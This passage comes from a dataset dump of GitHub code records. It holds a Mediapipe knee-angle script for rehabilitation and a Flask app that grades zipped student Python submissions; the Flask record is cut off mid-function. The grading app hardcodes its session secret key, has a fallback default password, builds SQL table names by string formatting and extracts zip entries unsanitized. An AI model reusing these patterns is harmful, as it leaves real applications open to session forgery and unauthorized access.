Layers\nDEZ_Masked = DEZ*M_VS\nwrite_ascii_raster(ROOT+'/Surface_Vertical_Strain_Rate_RBF',EE,NN,DEZ_Masked)","repo_name":"nts345045/SG_Seven_Decades","sub_path":"util/npy2gis_grid.py","file_name":"npy2gis_grid.py","file_ext":"py","file_size_in_byte":2556,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40462088826","text":"import cv2\nimport mediapipe as mp\nimport numpy as np\nmp_drawing = mp.solutions.drawing_utils\nmp_pose = mp.solutions.pose\n\n#calculate the angle between two lines\ndef calculate_angle(a,b,c):\n a = np.array(a) # hip\n b = np.array(b) # knee\n c = np.array(c) # ankle\n\n radians = np.arctan2(c[1]-b[1], c[0]-b[0]) - np.arctan2(a[1]-b[1], a[0]-b[0])\n angle = np.abs(radians*180.0/np.pi)\n\n if angle >180.0:\n angle = 360-angle\n\n return angle\ncap = cv2.VideoCapture(1)\n#Setup mediapipe instance\nwith mp_pose.Pose(min_detection_confidence=0.5, min_tracking_confidence=0.5) as pose:\n while cap.isOpened():\n ret, frame = cap.read()\n\n # Recolor image to RGB\n image = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n image.flags.writeable = False\n\n # Make detection\n results = pose.process(image)\n\n # Recolor back to BGR\n image.flags.writeable = True\n image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)\n\n # Extract landmarks\n try:\n landmarks = results.pose_landmarks.landmark\n\n # Get coordinates\n hip = [landmarks[mp_pose.PoseLandmark.LEFT_HIP.value].x,landmarks[mp_pose.PoseLandmark.LEFT_HIP.value].y]\n knee = [landmarks[mp_pose.PoseLandmark.LEFT_KNEE.value].x,landmarks[mp_pose.PoseLandmark.LEFT_KNEE.value].y]\n ankle = [landmarks[mp_pose.PoseLandmark.LEFT_ANKLE.value].x,landmarks[mp_pose.PoseLandmark.LEFT_ANKLE.value].y]\n\n # Calculate angle\n angle = calculate_angle(hip, knee, ankle)\n\n # Visualize angle\n cv2.putText(image, str(angle), (50,150)\n ,\n cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 255, 255), 2, cv2.LINE_AA\n )\n #visualize lines and points\n center_hip= tuple(np.multiply(hip, [640, 480]).astype(int))\n center_knee= tuple(np.multiply(knee, [640, 480]).astype(int))\n center_ankle= tuple(np.multiply(ankle, [640, 480]).astype(int))\n cv2.circle(image,center_hip,5, (255, 0, 0), -1)\n cv2.circle(image,center_knee,5, (255, 0, 0), -1)\n cv2.circle(image,center_ankle,5, (255, 0, 0), -1)\n\n cv2.line(image, center_hip, center_knee, (0,255, 0), 3)\n cv2.line(image, center_knee, center_ankle, (0,255, 0), 3)\n\n\n cv2.imshow('Sit to stand', image)\n\n except:\n pass\n\n\n\n if cv2.waitKey(10) & 0xFF == ord('c'):\n break\n\n cap.release()\n cv2.destroyAllWindows()\n","repo_name":"mohammadsanaee/Mediapipe-machine-learning-approach-in-rehabilition-robots","sub_path":"Mediapipe angle detection.py","file_name":"Mediapipe angle detection.py","file_ext":"py","file_size_in_byte":2561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30520849505","text":"from flask import Flask, render_template, send_from_directory, redirect, abort, request, jsonify, session, __version__, Response, make_response\nimport logging\n\nimport os\nimport zipfile\n\nimport sqlite3\n\nimport json\n\nimport threading\nimport subprocess\nimport re\nimport time\nimport datetime\nimport sys\nimport random\n\nimport argon2 #argon2-cffi\n\napp = Flask(__name__)\n\ninput_path = './input/'\nrun_path = './environ/'\n\ndbfile = 'ccp2.db'\n\napp.secret_key = b'\\x06\\xdcNB\\x93\\x9e-N\\xf0*\\x82\\xad\\x80\\x1e\\x95\\x0e'\nlogger = logging.getLogger('werkzeug')\nhandler = logging.FileHandler('access.log')\nlogger.addHandler(handler)\napp.testing = True\n\n@app.route('/auth', methods=['POST'])\ndef auth():\n\tph = argon2.PasswordHasher()\n\tpassword = getconfig('password')\n\tif password == None:\n\t\tpassword = ph.hash('ccp2021')\n\ttry:\n\t\tph.verify(password, request.form['password'])\n\t\tsession['auth'] = True\n\t\treturn redirect('/')\n\texcept:\n\t\tpass\n\tabort(403)\n\ndef get_all_list():\n\tconn = sqlite3.connect(dbfile)\n\tc = conn.cursor()\n\tc.execute('SELECT * FROM `metadata` WHERE `type`=\"project\";')\n\tmetadata = c.fetchone()\n\tproject = json.loads(metadata[2])\n\tif 'auth' not in session:\n\t\tproject = list(filter(lambda x: x['public'], project))\n\tproject = list(map(lambda x: x['name'], project))\n\tc.execute('SELECT * FROM `metadata` WHERE `type`=\"hw\";')\n\tmetadata = c.fetchone()\n\thw = json.loads(metadata[2])\n\tif 'auth' not in session:\n\t\thw = list(filter(lambda x: x['public'], hw))\n\thw = list(map(lambda x: x['name'], hw))\n\n\treturn hw + project\n\ndef get_all_list_dict():\n\tconn = sqlite3.connect(dbfile)\n\tc = conn.cursor()\n\tc.execute('SELECT * FROM `metadata` WHERE `type`=\"project\";')\n\tmetadata = c.fetchone()\n\tproject = json.loads(metadata[2])\n\tif 'auth' not in session:\n\t\tproject = filter(lambda x: x['public'], project)\n\tc.execute('SELECT * FROM `metadata` WHERE `type`=\"hw\";')\n\tmetadata = c.fetchone()\n\thw = json.loads(metadata[2])\n\tif 'auth' not in session:\n\t\thw = filter(lambda x: x['public'], hw)\n\tresult = dict([(i['name'], i) for i in project]+[(i['name'], i) for i in hw])\n\treturn result\n\ndef prepare_data():\n\tinit_db()\n\tconn = sqlite3.connect(dbfile)\n\tc = conn.cursor()\n\ttry:\n\t\tc.execute('SELECT * FROM `metadata` WHERE `type`=\"project\";')\n\t\tmetadata = c.fetchone()\n\t\tproject = json.loads(metadata[2])\n\t\tc.execute('SELECT * FROM `metadata` WHERE `type`=\"hw\";')\n\t\tmetadata = c.fetchone()\n\t\thw = json.loads(metadata[2])\n\texcept:\n\t\tproject = []\n\t\thw = []\n\n\tpassword = getconfig('password')\n\tpw_notset = password == None\n\t\n\treturn {'project': project, 'hw': hw, 'version': sys.version_info, 'fversion': __version__, 'auth': 'auth' in session, 'rand': random.random(), 'pw_notset': pw_notset}\n\ndef student_init():\n\treturn {\n\t\t'log_zip': '',\n\t\t'log_zip_detail': [],\n\t\t'score': -1,\n\t\t'code': '',\n\t\t'val': {\n\t\t\t'score': 0\n\t\t}\n\t}\n\n@app.route('/')\ndef index():\n\treturn render_template('index.html', data={'data': prepare_data()})\n\n@app.route('/details')\ndef detail():\n\tdeduce_decimal = getconfig('deduce_decimal', 0.1)\n\treturn render_template('details.html', data={'data': prepare_data(), 'deduce_decimal': deduce_decimal*100})\n\ndef getconfig(typetext, default=None):\n\tconn = sqlite3.connect(dbfile)\n\tc = conn.cursor()\n\tc.execute('SELECT * FROM `metadata` WHERE `type`=?;', (typetext,))\n\tresult = c.fetchone()\n\tif result == None:\n\t\treturn default\n\telse:\n\t\treturn json.loads(result[2])\n\ndef setconfig(typetext, value):\n\tconn = sqlite3.connect(dbfile)\n\tc = conn.cursor()\n\tc.execute('SELECT * FROM `metadata` WHERE `type`=?;', (typetext,))\n\tresult = c.fetchone()\n\tvalue = json.dumps(value)\n\tif result == None:\n\t\tc.execute('INSERT INTO `metadata`(`type`, `value`) VALUES (?,?);', (typetext, value))\n\telse:\n\t\tc.execute('UPDATE `metadata` SET `value`=? WHERE `type`=?;', (value, typetext))\n\tconn.commit()\n\n@app.route('/settings', methods=['GET', 'POST'])\ndef settings():\n\tif not 'auth' in session:\n\t\tabort(404)\n\tif request.method == 'POST':\n\t\tdata = prepare_data()\n\t\tsetconfig('max_error', float(request.form.get('max_error', 0)))\n\t\tsetconfig('deduce_decimal', float(request.form.get('deduce_decimal', 0))/100)\n\t\tsetconfig('deduce_wrong', float(request.form.get('deduce_wrong', 0))/100)\n\t\tsetconfig('deduce_tle', float(request.form.get('deduce_tle', 0))/100)\n\t\tsetconfig('deduce_runtime', float(request.form.get('deduce_runtime', 0))/100)\n\t\t\n\t\tsetconfig('time_limit', float(request.form.get('time_limit', 0)))\n\t\tsetconfig('script', request.form.get('script'))\n\t\tsetconfig('run_filename', request.form.get('run_filename'))\n\t\t\n\tdata = prepare_data()\n\tdeduce_decimal = getconfig('deduce_decimal', 0.1)\n\tdeduce_wrong = getconfig('deduce_wrong', 1.0)\n\tdeduce_tle = getconfig('deduce_tle', 1.0)\n\tdeduce_runtime = getconfig('deduce_runtime', 1.0)\n\n\tadmin_public_id = getconfig('admin_public_id', True)\n\tadmin_public_name = getconfig('admin_public_name', True)\n\n\tscript = getconfig('script', 'python3')\n\trun_filename = getconfig('run_filename', 'main.py')\n\t\n\tdeduce_decimal *= 100 #to percentage\n\tdeduce_wrong *= 100 #to percentage\n\tdeduce_tle *= 100 #to percentage\n\tdeduce_runtime *= 100 #to percentage\n\n\tmax_error = getconfig('max_error', 0.001)\n\ttime_limit = getconfig('time_limit', 1.0)\n\n\tdata_form = {'data': data, 'deduce_decimal': deduce_decimal, 'deduce_wrong': deduce_wrong, 'deduce_tle': deduce_tle, 'deduce_runtime': deduce_runtime, 'max_error': max_error, 'time_limit': time_limit, 'admin_public_id': admin_public_id, 'admin_public_name': admin_public_name, 'script': script, 'run_filename': run_filename}\n\treturn render_template('settings.html', data=data_form)\n\n@app.route('/settings/admin', methods=['POST'])\ndef settings_admin():\n\tif not 'auth' in session:\n\t\tabort(404)\n\tif request.form.get('check-public-id') != None:\n\t\tsetconfig('admin_public_id', True)\n\telse:\n\t\tsetconfig('admin_public_id', False)\n\tif request.form.get('check-public-name') != None:\n\t\tsetconfig('admin_public_name', True)\n\telse:\n\t\tsetconfig('admin_public_name', False)\n\treturn redirect('/settings')\n\n@app.route('/settings/password', methods=['POST'])\ndef settings_password():\n\tif not 'auth' in session:\n\t\tabort(404)\n\tif request.form.get('password') != None and request.form.get('password') != '' and request.form.get('password') == request.form.get('password-re'):\n\t\tph = argon2.PasswordHasher()\n\t\tpassword = ph.hash(request.form.get('password'))\n\t\tsetconfig('password', password)\n\t\treturn redirect('/settings')\n\tabort(418)\n\n@app.route('/logout')\ndef logout():\n\tif 'auth' in session:\n\t\tdel session['auth']\n\treturn redirect('/')\n\n@app.route('/project/')\ndef project(project_name):\n\tif project_name in get_all_list():\n\t\tconn = sqlite3.connect(dbfile)\n\t\tc = conn.cursor()\n\t\ttry:\n\t\t\tc.execute('CREATE TABLE `{}`(`id` INTEGER PRIMARY KEY AUTOINCREMENT, `student_id` TEXT, `student_name` TEXT, `result` INTEGER, `data` TEXT);'.format(project_name))\n\t\texcept:\n\t\t\tpass\n\t\ttry:\n\t\t\tc.execute('CREATE TABLE `{}_val`(`id` INTEGER PRIMARY KEY, `INPUT` TEXT, `OUTPUT` TEXT, `data` TEXT);'.format(project_name))\n\t\texcept:\n\t\t\tpass\n\t\tconn.commit()\n\t\tc.execute('SELECT * FROM `{}`;'.format(project_name))\n\t\tprojects = c.fetchall()\n\t\tprojects = list(map(lambda x: list(x), projects))\n\t\tscore_sum = 0\n\t\tproject_count = 1e-8\n\t\tscore_var = 0\n\t\tfor i in projects:\n\t\t\ti[4] = json.loads(i[4])\n\t\t\tif 'val' in i[4]:\n\t\t\t\tscore_sum += i[4]['val']['score']\n\t\t\t\tproject_count += 1\n\t\tscore_avg = score_sum / project_count\n\t\tfor i in projects:\n\t\t\tif 'val' in i[4]:\n\t\t\t\tscore_var += (i[4]['val']['score']-score_avg)**2\n\t\tscore_var = score_var / project_count\n\t\tscore_std = score_var**0.5\n\t\tc.execute('SELECT * FROM `{}_val`;'.format(project_name))\n\t\tval_set = c.fetchall()\n\t\tscore_max = 0\n\t\tfor i in val_set:\n\t\t\ti_decoded = json.loads(i[3])\n\t\t\tscore_max += i_decoded['score']\n\t\tsample_path = os.path.join(input_path, project_name, 'reference.py')\n\t\tsample = ''\n\t\tif os.path.exists(sample_path):\n\t\t\twith open(sample_path, 'r') as f:\n\t\t\t\tsample = f.read()\n\t\tadmin_public_id = getconfig('admin_public_id')\n\t\tadmin_public_name = getconfig('admin_public_name')\n\n\t\tif not 'auth' in session:\n\t\t\tpjhw = get_all_list_dict()\n\t\t\tnumbers = list(map(lambda x: x[1][-3:], projects))\n\t\t\tif not 'data_public' in pjhw[project_name]:\n\t\t\t\tpjhw[project_name]['data_public'] = False\n\t\t\tfor i in projects:\n\t\t\t\tif numbers.count(i[1][-3:]) > 1:\n\t\t\t\t\ti[2] = i[2][0]+'**'\n\t\t\t\telse:\n\t\t\t\t\ti[2] = '***'\n\t\t\t\ti[1] = '****-**'+i[1][-3:]\n\t\t\treturn render_template('project_public.html', data={'data': prepare_data(), 'project_name': project_name, 'projects': projects, 'score_avg': score_avg, 'score_max': score_max, 'score_std': score_std, 'sample': sample, 'data_public': pjhw[project_name]['data_public']})\n\t\treturn render_template('project.html', data={'data': prepare_data(), 'project_name': project_name, 'projects': projects, 'score_avg': score_avg, 'score_max': score_max, 'score_std': score_std, 'sample': sample, 'admin_public_id': admin_public_id, 'admin_public_name': admin_public_name})\n\telse:\n\t\tabort(404)\n\n@app.route('/project/add_student/', methods=['POST'])\ndef add_student(project_name):\n\tif project_name in get_all_list():\n\t\tif not 'auth' in session:\n\t\t\tabort(404)\n\t\tif 'student-id' not in request.form or 'student-name' not in request.form:\n\t\t\tabort(406)\n\t\tstudent_id = request.form.get('student-id')\n\t\tstudent_name = request.form.get('student-name')\n\t\tdata = student_init()\n\t\tdata['log_zip'] = 'Unzip succeed'\n\t\tdata['log_zip_detail'] = ['main.py']\n\t\tresult = '1' #(unzip result)\n\t\tconn = sqlite3.connect(dbfile)\n\t\tc = conn.cursor()\n\t\tc.execute('INSERT INTO `{}`(`student_id`, `student_name`, `result`, `data`) VALUES (?,?,?,?)'.format(project_name), (student_id, student_name, result, json.dumps(data)))\n\t\tconn.commit()\n\t\treturn redirect('/project/{}'.format(project_name))\n\telse:\n\t\tabort(404)\n\n@app.route('/project/remove_student//', methods=['POST'])\ndef remove_student(project_name, student_id):\n\tif project_name in get_all_list():\n\t\tif not 'auth' in session:\n\t\t\tabort(404)\n\t\tconn = sqlite3.connect(dbfile)\n\t\tc = conn.cursor()\n\t\tc.execute('DELETE FROM `{}` WHERE `id`=?;'.format(project_name), (student_id,))\n\t\tconn.commit()\n\t\treturn 'ok'\n\telse:\n\t\tabort(404)\n\n@app.route('/project/download/')\ndef project_download(project_name):\n\tif project_name in get_all_list():\n\t\tif not 'auth' in session:\n\t\t\tabort(401)\n\t\tconn = sqlite3.connect(dbfile)\n\t\tc = conn.cursor()\n\t\tc.execute('SELECT * FROM `{}`;'.format(project_name))\n\t\tprojects = c.fetchall()\n\t\tprojects = list(map(lambda x: list(x), projects))\n\t\tscore_sum = 0\n\t\tproject_count = 1e-8\n\t\tresult = '#,student_id,student_name,filename,score(total),'\n\n\t\tc.execute('SELECT * FROM `{}_val`;'.format(project_name))\n\t\tval_set = c.fetchall()\n\t\tscore_max = 0\n\t\tfor k, i in enumerate(val_set):\n\t\t\ti_decoded = json.loads(i[3])\n\t\t\tscore_max += i_decoded['score']\n\t\t\tresult += 'case #{},'.format(k)\n\t\t\n\t\tresult += '\\n'\n\t\tresult += '0,(Max score),(Max score),,{},'.format(score_max)\n\n\t\tfor k, i in enumerate(val_set):\n\t\t\ti_decoded = json.loads(i[3])\n\t\t\tresult += '{},'.format(i_decoded['score'])\n\t\tresult += '\\n'\n\n\t\tfor i in projects:\n\t\t\ti[4] = json.loads(i[4])\n\t\t\tif 'val' in i[4]:\n\t\t\t\tscore_sum += i[4]['val']['score']\n\t\t\t\tproject_count += 1\n\t\t\t\tresult += '{},{},{},'.format(i[0], i[1], i[2])\n\t\t\t\tresult += '{},{},'.format(int(i[4]['log_zip']=='Unzip succeed'), i[4]['val']['score'])\n\t\t\t\tfor j in i[4]['val']['details']:\n\t\t\t\t\tresult += '{},'.format(j['score'])\n\t\t\t\tresult += '\\n'\n\t\tscore_avg = score_sum / project_count\n\t\t\n\t\tresp = make_response(result)\n\t\tresp.headers['Content-Type'] = 'text/csv;charset=UTF-8'\n\t\tresp.headers['Content-Disposition'] = 'attachment;filename={}.csv'.format(project_name)\n\t\treturn resp\n\telse:\n\t\tabort(404)\n\n@app.route('/project/upload/')\ndef project_upload(project_name):\n\tif not 'auth' in session:\n\t\tabort(404)\n\tif project_name in get_all_list():\n\t\treturn render_template('upload.html', data={'data': prepare_data(), 'project_name': project_name})\n\n@app.route('/project/load/', methods=['POST'])\ndef project_load(project_name):\n\tif not 'auth' in session:\n\t\tabort(404)\n\tif project_name in get_all_list():\n\t\tif 'file' not in request.files:\n\t\t\tabort(406)\n\t\tfile = request.files['file']\n\t\tpath = os.path.join(input_path, project_name)\n\t\tif not os.path.exists(path):\n\t\t\tos.mkdir(path)\n\t\tfile.save(os.path.join(path, 'uploaded.zip'))\n\t\twith zipfile.ZipFile(os.path.join(path, 'uploaded.zip'), 'r') as zipf:\n\t\t\tcontent = zipf.namelist()\n\t\t\tfor i in content:\n\t\t\t\tif i.split('.')[-1] == 'zip':\n\t\t\t\t\tzipf.extract(i, path)\n\n\t\tsubs = os.listdir(path)\n\t\tprocessed = {}\n\t\tconn = sqlite3.connect(dbfile)\n\t\tc = conn.cursor()\n\t\ttry:\n\t\t\tc.execute('DROP TABLE `{}`'.format(project_name))\n\t\t\tconn.commit()\n\t\t\tc.execute('CREATE TABLE `{}`(`id` INTEGER PRIMARY KEY AUTOINCREMENT, `student_id` TEXT, `student_name` TEXT, `result` INTEGER, `data` TEXT);'.format(project_name))\n\t\texcept:\n\t\t\tpass\n\t\tconn.commit()\n\t\t\n\t\tfor file in subs:\n\t\t\tif file.split('.')[-1] != 'zip': continue #ignore if not .zip\n\t\t\tif file == 'uploaded.zip': continue #ignore uploaded zip file\n\t\t\tstudent_name = file.split('_')[0]\n\t\t\tstudent_id = file.split('_')[1]\n\t\t\tresult = -1\n\t\t\tdata = student_init()\n\t\t\ttry:\n\t\t\t\twith zipfile.ZipFile(os.path.join(path, file), 'r') as zipf:\n\t\t\t\t\tcontent = zipf.namelist()\n\t\t\t\t\tcode = ''\n\t\t\t\t\tresult = 0\n\t\t\t\t\ttarget_path = os.path.join(path, student_name + '_' + student_id)\n\t\t\t\t\tfor i in content:\n\t\t\t\t\t\tfilename = i.split('/')[-1]\n\t\t\t\t\t\tif len(filename) > 0 and filename[0] == '.':\n\t\t\t\t\t\t\t#hidden file\n\t\t\t\t\t\t\tpass\n\t\t\t\t\t\telif len(i) >= 7 and i[-7:] == 'main.py' and result == 0:\n\t\t\t\t\t\t\tresult = 1\n\t\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\t\tos.mkdir(target_path)\n\t\t\t\t\t\t\texcept FileExistsError:\n\t\t\t\t\t\t\t\tpass\n\t\t\t\t\t\t\tdata['log_zip_detail'] = [i]\n\t\t\t\t\t\t\tzipf.extract(i, os.path.join(target_path))\n\t\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\t\twith open(os.path.join(target_path, i), 'r') as f:\n\t\t\t\t\t\t\t\t\tcode = f.read()\n\t\t\t\t\t\t\texcept UnicodeDecodeError:\n\t\t\t\t\t\t\t\twith open(os.path.join(target_path, i), 'r', encoding='ISO-8859-1') as f:\n\t\t\t\t\t\t\t\t\tcode = f.read()\n\t\t\t\t\t\t\tdata['log_zip'] = 'Unzip succeed'\n\t\t\t\t\t\telif result == 1 and i[-7:] == 'main.py':\n\t\t\t\t\t\t\tresult = 2\n\t\t\t\t\t\t\tdata['log_zip'] = '>1 main.py files'\n\t\t\t\t\t\t\tdata['log_zip_detail'].append(i)\n\t\t\t\t\tif result == 0: #when no main.py is found\n\t\t\t\t\t\tfor j in content:\n\t\t\t\t\t\t\tif len(j) >= 3 and j[-3:] == '.py':\n\t\t\t\t\t\t\t\tfilename = j.split('/')[-1]\n\t\t\t\t\t\t\t\tif len(filename) > 0 and filename[0] == '.':\n\t\t\t\t\t\t\t\t\t#hidden file\n\t\t\t\t\t\t\t\t\tpass\n\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\tdata['log_zip'] = 'no main.py'\n\t\t\t\t\t\t\t\t\tdata['log_zip_detail'].append(j)\n\t\t\t\t\t\t\t\t\tzipf.extract(j, os.path.join(target_path))\n\t\t\t\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\t\t\t\twith open(os.path.join(target_path, j), 'r') as f:\n\t\t\t\t\t\t\t\t\t\t\tcode = f.read()\n\t\t\t\t\t\t\t\t\texcept UnicodeDecodeError:\n\t\t\t\t\t\t\t\t\t\twith open(os.path.join(target_path, j), 'r', encoding='ISO-8859-1') as f:\n\t\t\t\t\t\t\t\t\t\t\tcode = f.read()\n\t\t\t\t\t\t\t\t\tresult = 3\n\t\t\t\t\tif result == 0:\n\t\t\t\t\t\tdata['log_zip'] = 'no .py found'\n\t\t\t\t\t\tdata['log_zip_detail'] = content\n\t\t\texcept zipfile.BadZipfile:\n\t\t\t\tdata['log_zip'] = 'Bad zip file'\n\t\t\tlog_zip_detail_decoded = []\n\t\t\tfor j in data['log_zip_detail']:\n\t\t\t\ttry:\n\t\t\t\t\tj = j.encode('437')\n\t\t\t\texcept UnicodeEncodeError:\n\t\t\t\t\tj = j.encode('utf8')\n\t\t\t\ttry:\n\t\t\t\t\tj = j.decode('utf8')\n\t\t\t\texcept:\n\t\t\t\t\tj = j.decode('949')\n\t\t\t\tlog_zip_detail_decoded.append(j)\n\t\t\tdata['log_zip_detail'] = log_zip_detail_decoded\n\t\t\tdata['code'] = code\n\t\t\tc.execute('INSERT INTO `{}`(`student_id`, `student_name`, `result`, `data`) VALUES (?,?,?,?)'.format(project_name), (student_id, student_name, result, json.dumps(data)))\n\t\t\tconn.commit()\n\t\treturn redirect('/project/' + project_name)\n\telse:\n\t\tabort(404)\n\n@app.route('/project/data/')\ndef project_data(project_name):\n\tif project_name in get_all_list():\n\t\tif not 'auth' in session:\n\t\t\tpjhw = get_all_list_dict()\n\t\t\tif pjhw[project_name]['data_public'] == False:\n\t\t\t\tabort(404)\n\t\t\tconn = sqlite3.connect(dbfile)\n\t\t\tc = conn.cursor()\n\t\t\tc.execute('SELECT * FROM `{}_val`;'.format(project_name))\n\t\t\tval_set = c.fetchall()\n\t\t\tval_set = list(map(lambda x: list(x), val_set))\n\t\t\tfor i in val_set:\n\t\t\t\ti[3] = json.loads(i[3])\n\t\t\t\ti[2] = i[2].replace('\\n', '\\\\n')\n\t\t\t\ti[1] = i[1].replace('\\n', '\\\\n')\n\t\t\treturn render_template('validation_public.html', data={'data': prepare_data(), 'val_set': val_set, 'project_name': project_name})\n\t\tconn = sqlite3.connect(dbfile)\n\t\tc = conn.cursor()\n\t\tc.execute('SELECT * FROM `{}_val`;'.format(project_name))\n\t\tval_set = c.fetchall()\n\t\tval_set = list(map(lambda x: list(x), val_set))\n\t\tfor i in val_set:\n\t\t\ti[3] = json.loads(i[3])\n\t\t\ti[2] = i[2].replace('\\n', '\\\\n')\n\t\t\ti[1] = i[1].replace('\\n', '\\\\n')\n\t\t\tif 'val_mode' not in i[3]:\n\t\t\t\ti[3]['val_mode'] = {\n\t\t\t\t\t'check_num': True,\n\t\t\t\t\t'check_char': True\n\t\t\t\t}\n\t\tmetadata = getconfig('metadata_{}'.format(project_name), {})\n\t\tif 'is_val_custom' not in metadata:\n\t\t\tmetadata['is_val_custom'] = False\n\t\tif 'code_val_custom' not in metadata:\n\t\t\tmetadata['code_val_custom'] = ''\n\t\treturn render_template('validation.html', data={'data': prepare_data(), 'val_set': val_set, 'project_name': project_name, 'is_val_custom': metadata['is_val_custom'], 'code_val_custom': metadata['code_val_custom']})\n\telse:\n\t\tabort(404)\n\n@app.route('/project/validation/', methods=['POST'])\ndef validation_save(project_name):\n\tif project_name in get_all_list():\n\t\tif not 'auth' in session:\n\t\t\tabort(403)\n\t\telse:\n\t\t\tmetadata = getconfig('metadata_{}'.format(project_name), {})\n\t\t\tif request.form.get('check-custom') == 'on':\n\t\t\t\tmetadata['is_val_custom'] = True\n\t\t\t\tmetadata['code_val_custom'] = request.form.get('code')\n\t\t\telse:\n\t\t\t\tmetadata['is_val_custom'] = False\n\t\t\tsetconfig('metadata_{}'.format(project_name), metadata)\n\t\t\t\t\n\t\t\treturn redirect('/project/data/{}'.format(project_name))\n\telse:\n\t\tabort(404)\n\ndef init_db():\n\tconn = sqlite3.connect(dbfile)\n\tc = conn.cursor()\n\ttry:\n\t\tc.execute('CREATE TABLE `metadata`(`id` INTEGER PRIMARY KEY AUTOINCREMENT, `type` TEXT, `value` TEXT);')\n\t\tconn.commit()\n\texcept:\n\t\tpass\n\n@app.route('/manage')\ndef manage():\n\tif not 'auth' in session:\n\t\tabort(404)\n\tinit_db()\n\tproject = getconfig('project', [])\n\thw = getconfig('hw', [])\n\treturn render_template('manage.html', data={'data': prepare_data(), 'project': project, 'hw': hw})\n\n@app.route('/manage/save/', methods=['POST'])\ndef manage_save(reqtype):\n\tif not 'auth' in session:\n\t\tabort(404)\n\tdata = []\n\tfor k, i in request.json.items():\n\t\tdata.append({'id': i['id'], 'name': i['name'], 'public': i['public'], 'data_public': i['data_public']})\n\n\treqtype_table = {\n\t\t'0': 'hw',\n\t\t'1': 'project'\n\t}\n\n\tsetconfig(reqtype_table[reqtype], data)\n\t\n\treturn 'ok'\n\n@app.route('/project/save//', methods=['POST'])\ndef project_code_save(project_name, index):\n\tif not 'auth' in session:\n\t\tabort(401)\n\tif project_name in get_all_list():\n\t\tconn = sqlite3.connect(dbfile)\n\t\tc = conn.cursor()\n\t\tc.execute('SELECT * FROM `{}` WHERE `id`=?;'.format(project_name), (index,))\n\t\tresult = c.fetchone()\n\t\tresult = json.loads(result[4])\n\t\ttry:\n\t\t\tresult['code'] = request.form.get('code')\n\t\t\tresult = json.dumps(result)\n\t\t\tc.execute('UPDATE {} SET `data`=? WHERE `id`=?;'.format(project_name), (result, index,))\n\t\t\tconn.commit()\n\t\t\treturn 'ok'\n\t\texcept:\n\t\t\treturn 'error'\n\n@app.route('/project/data/save/', methods=['POST'])\ndef project_data_save(project_name):\n\tif not 'auth' in session:\n\t\tabort(401)\n\tif project_name in get_all_list():\n\t\tconn = sqlite3.connect(dbfile)\n\t\tc = conn.cursor()\n\t\tc.execute('DELETE FROM `{}_val`;'.format(project_name))\n\t\tdata = request.json\n\t\tfor k, v in data.items():\n\t\t\ttry:\n\t\t\t\tscore = float(v['score'])\n\t\t\texcept:\n\t\t\t\tscore = 0\n\t\t\tmetadata = json.dumps({\n\t\t\t\t'score': score,\n\t\t\t\t'val_mode': {\n\t\t\t\t\t'check_num': v['val_mode']['check_num'],\n\t\t\t\t\t'check_char': v['val_mode']['check_char'],\n\t\t\t\t}\n\t\t\t\t})\n\t\t\tv['output'] = v['output'].replace('\\\\n', '\\n')\n\t\t\tv['input'] = v['input'].replace('\\\\n', '\\n')\n\t\t\t\n\t\t\tc.execute('INSERT INTO `{}_val`(`id`, `INPUT`, `OUTPUT`, `data`) VALUES (?,?,?,?);'.format(project_name), (v['id'], v['input'], v['output'], metadata))\n\t\t\tconn.commit()\n\t\treturn 'ok'\n\telse:\n\t\tabort(404)\n\n@app.route('/project/view//')\ndef view_code(project_name, id):\n\tif not 'auth' in session:\n\t\tabort(404)\n\tif project_name in get_all_list():\n\t\tconn = sqlite3.connect(dbfile)\n\t\tc = conn.cursor()\n\t\ttry:\n\t\t\tc.execute('SELECT * FROM {} WHERE `id`=?;'.format(project_name), (id,))\n\t\texcept:\n\t\t\tpass\n\t\tresult = c.fetchone()\n\t\tcode = json.loads(result[4])['code']\n\t\treturn Response(code, mimetype='text/plain')\n\n@app.route('/project/result//')\ndef view_result(project_name, id):\n\tif project_name in get_all_list():\n\t\tif not 'auth' in session:\n\t\t\tconn = sqlite3.connect(dbfile)\n\t\t\tc = conn.cursor()\n\t\t\ttry:\n\t\t\t\tc.execute('SELECT * FROM {} WHERE `id`=?;'.format(project_name), (id,))\n\t\t\texcept:\n\t\t\t\tpass\n\t\t\tresult = c.fetchone()\n\t\t\tresult = json.loads(result[4])['val']\n\t\t\tresult['student_id'] = '****-**' + result['student_id'][-3:]\n\t\t\tresult['student_name'] = '***'\n\t\t\t\n\t\t\treturn jsonify(result)\n\t\tconn = sqlite3.connect(dbfile)\n\t\tc = conn.cursor()\n\t\ttry:\n\t\t\tc.execute('SELECT * FROM {} WHERE `id`=?;'.format(project_name), (id,))\n\t\texcept:\n\t\t\tpass\n\t\tresult = c.fetchone()\n\t\tresult = json.loads(result[4])['val']\n\t\tif getconfig('admin_public_id', True) == False:\n\t\t\tresult['student_id'] = '****-**' + result['student_id'][-3:]\n\t\tif getconfig('admin_public_name', True) == False:\n\t\t\tresult['student_name'] = '***'\n\t\treturn jsonify(result)\n\n@app.route('/project/run/', methods=['POST'])\ndef run_code(project_name):\n\tif not 'auth' in session:\n\t\tabort(404)\n\tif project_name in get_all_list():\n\t\tconn = sqlite3.connect(dbfile)\n\t\tc = conn.cursor()\n\t\t\n\t\tcode_id = request.form.get('id')\n\n\t\tstudent_name = 'sample'\n\t\tstudent_id = '2021-00000'\n\n\t\tif code_id == '-1':\n\t\t\tdata_student = {}\n\t\t\tcode = request.form.get('code')\n\t\telse:\n\t\t\tc.execute('SELECT * FROM {} WHERE `id`=?;'.format(project_name), (code_id,))\n\n\t\t\tresult = c.fetchone()\n\t\t\tif result == None:\n\t\t\t\treturn jsonify({'result': False, 'msg': 'student not found'})\n\t\t\tdata_student = json.loads(result[4])\n\t\t\tstudent_name = result[2]\n\t\t\tstudent_id = result[1]\n\t\t\tcode = data_student['code']\n\t\t\tdata_student['val'] = {\n\t\t\t\t'score': 0,\n\t\t\t\t'details': [],\n\t\t\t\t'score_total': 